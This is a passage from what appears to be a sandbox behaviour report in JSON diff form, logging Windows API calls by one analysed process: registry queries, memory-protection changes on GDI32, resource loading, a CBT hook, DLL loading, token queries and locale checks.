"api": "RegOpenKeyExA", + "status": false, + "return": "0x00000002", + "arguments": [ + { + "name": "Registry", + "value": "0x80000001", + "pretty_value": "HKEY_CURRENT_USER" + }, + { + "name": "SubKey", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network" + }, + { + "name": "Handle", + "value": "0x00000000" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network" + } + ], + "repeated": 0, + "id": 168 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e76", + "parentcaller": "0x00456eee", + "category": "registry", + "api": "RegCloseKey", + "status": false, + "return": "0x00000006", + "arguments": [ + { + "name": "Handle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 169 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e12", + "parentcaller": "0x00456eee", + "category": "registry", + "api": "RegOpenKeyExA", + "status": false, + "return": "0x00000002", + "arguments": [ + { + "name": "Registry", + "value": "0x80000001", + "pretty_value": "HKEY_CURRENT_USER" + }, + { + "name": "SubKey", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32" + }, + { + "name": "Handle", + "value": "0x00000000" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32" + } + ], + "repeated": 0, + "id": 170 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00456e76", + "parentcaller": "0x00456eee", + "category": "registry", + "api": "RegCloseKey", + "status": false, + "return": "0x00000006", + "arguments": [ + { + "name": "Handle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 171 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 172 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 173 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 174 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 175 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 176 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 177 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 178 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 179 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 180 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00402cfc", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 181 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x004360fb", + "parentcaller": "0x004024e4", + "category": "misc", + "api": "FindResourceExA", + "status": true, + "return": "0x0048aa08", + "arguments": [ + { + "name": "Module", + "value": "0x00400000" + }, + { + "name": "Type", + "value": "#5" + }, + { + "name": "Name", + "value": "#102" + }, + { + "name": "Language", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 182 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00436103", + "parentcaller": "0x004024e4", + "category": "misc", + "api": "LoadResource", + "status": true, + "return": "0x004be720", + "arguments": [ + { + "name": "Module", + "value": "0x00400000" + }, + { + "name": "ResourceInfo", + "value": "0x0048aa08" + } + ], + "repeated": 0, + "id": 183 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00436115", + "parentcaller": "0x004024e4", + "category": "misc", + "api": "LockResource", + "status": true, + "return": "0x004be720", + "arguments": [ + { + "name": "ResourceData", + "value": "0x004be720" + } + ], + "repeated": 0, + "id": 184 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00432e86", + "parentcaller": "0x004024e4", + "category": "system", + "api": "SetWindowsHookExA", + "status": true, + "return": "0x000305c3", + "arguments": [ + { + "name": "HookIdentifier", + "value": "5", + "pretty_value": "WH_CBT" + }, + { + "name": "ProcedureAddress", + "value": "0x00432c2f" + }, + { + "name": "ModuleAddress", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "9440" + } + ], + "repeated": 0, + "id": 185 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435ef3", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 186 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435ef3", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 187 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435ef3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 188 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 189 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 190 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 191 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 192 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 193 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 194 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 195 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 196 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 197 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 198 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 199 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 200 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430476", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 201 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x0043047f", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "COMCTL32.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 202 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00430493", + "parentcaller": "0x00435efd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "COMCTL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + }, + { + "name": "FunctionName", + "value": "InitCommonControlsEx" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73e7e3e0" + } + ], + "repeated": 0, + "id": 203 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 204 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 205 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 206 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76fc0000" + }, + { + "name": "ModuleName", + "value": "GDI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 207 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "x\\xb8\\x1e\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00,\\xb9\\x1e\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 208 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x88\\xedr\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 209 + }, + { + "timestamp": "2025-03-07 22:33:07,985", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "__notification__", + "api": "sysenter", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadIdentifier", + "value": "9440" + }, + { + "name": "Module", + "value": "KERNELBASE.dll" + }, + { + "name": "Return Address", + "value": "0x756e413c" + } + ], + "repeated": 0, + "id": 210 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000284" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" + } + ], + "repeated": 0, + "id": 211 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000284" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES" + } + ], + "repeated": 0, + "id": 212 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000284" + } + ], + "repeated": 0, + "id": 213 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000284" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" + } + ], + "repeated": 0, + "id": 214 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000284" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES" + } + ], + "repeated": 0, + "id": 215 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000284" + } + ], + "repeated": 0, + "id": 216 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "GetUserDefaultLCID", + "status": true, + "return": "0x00000c0a", + "arguments": [ + { + "name": "SystemDefaultLangID", + "value": "0x00000c0a" + }, + { + "name": "LanguageName", + "value": "Spanish (Spain)" + } + ], + "repeated": 0, + "id": 217 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00733000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 218 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": 